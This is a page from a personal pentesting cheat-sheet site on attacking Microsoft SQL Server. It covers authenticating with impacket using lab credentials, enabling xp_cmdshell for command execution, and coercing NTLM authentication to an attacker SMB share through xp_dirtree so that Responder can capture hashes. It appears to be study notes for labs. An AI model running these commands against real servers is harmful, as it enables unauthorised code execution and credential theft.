Programmerboy Pentesting Stuff
  • Welcome
  • Web Pentesting Stuff
    • Pentesting Port 80,443
      • FFUF Commands
      • Virtual Host Scanning
      • Javascript DeObfuscation
      • Pentesting JWT (JSON Web Tokens)
      • Pentesting Graphql
      • Pentesting Redis 6379
  • CMS Pentesting
    • Wordpress Pentesting
    • Jenkins
    • Grafana
  • Network Penetration Testing
    • Nmap Commands
    • 53 - Pentesting DNS
    • 88 - Pentesting Kerberos
    • 111 - Pentesting RPC
    • 389 - Pentesting LDAP
    • 445 - Pentesting SMB
    • 873 - Pentesting Rsync
    • 1433 - Pentesting MSSQL
    • 2049 - Pentesting NFS
    • 3389 Pentesting RDP
    • 3306 - Pentesting Mysql
    • 5000 - Pentesting Docker Registry
  • Active Directory Pentesting
    • Methodology
  • Password and Bruteforce Attacks
    • Hydra
    • Cewl
    • Making Custom Wordlists (Usernames)
    • JSON to txt Wordlist
  • Linux Privilege Escalation
    • Getting a Fully Interactive TTY Shell
    • Docker Container Escape
  • Windows Privilege Escalation
    • Tunneling and Pivoting
    • Methodology
  • Bug Bounty
    • Bug Bounty Methodology
    • XSS
    • SQL Injection
    • Command Injection
    • File Upload Pentesting
    • Local and Remote File Inclusion
    • Broken Authentication
    • Server Side Request Forgery (SSRF)
    • XML External Entity (XXE)
    • Server Side Template Injection (SSTI)
    • ReconFTW (six2dez)
    • JS Files
    • SignUp Page
  • CTFs
    • WEB
    • Regex Bypass
    • Grep & Regex & Find strings
  • Python Programs for Pentesting
    • Python Code Snippets
  • Certifications-Notes
    • CRTO & Cobalt Strike
  • Phishing and Real World Stuff
    • Email Spoofing
    • Attacking Office 365 & Exchange
  • Cloud Pentesting
    • Enumeration
Powered by GitBook
On this page
  • Authentication with Creds
  • RCE in MSSQL
  • xp_cmdshell
  • UNC Path Injection (xp_dirtree)
  • xp_fileexist && sys.dm_os_file_exists
  1. Network Penetration Testing

1433 - Pentesting MSSQL

Authentication with Creds

impacket-mssqlclient klendathu.vl/zim:football22@10.10.179.150 -windows-auth

RCE in MSSQL

xp_cmdshell

First We can try to enable xp_cmdshell and then run commands easily

enable_xp_cmdshell   # this enables xp_cmdshell
xp_cmdshell whoami   # whoami command works

UNC Path Injection (xp_dirtree)

we can use xp_dirtree to authenticate to our own smb share, in this case we will be able to get the hash of the sql server user and then we can either relay the hash or crack the hash 

# On MSSQL Server
xp_dirtree //10.10.8.85/doesnotexists
# OR
exec master.sys.xp_dirtree '\\10.10.8.85\doesnotexists',1,1

# On kali Linux
sudo responder -I tun0

# you should get a hash on your responder

xp_fileexist && sys.dm_os_file_exists

we can use file excist as well, and sys.dm_os_file_exists to. In SQL Server 2017 xp_fileexist was replaced by a dynamic funtion called sys.dm_os_file_exists

xp_fileexist 'C:\'


# Change this

exec master.dbo.xp_fileExist 'adsnt.dll'

# To this
SELECT * FROM sys.dm_os_file_exists ('adsnt.dll')

Previous873 - Pentesting RsyncNext2049 - Pentesting NFS

Last updated 1 month ago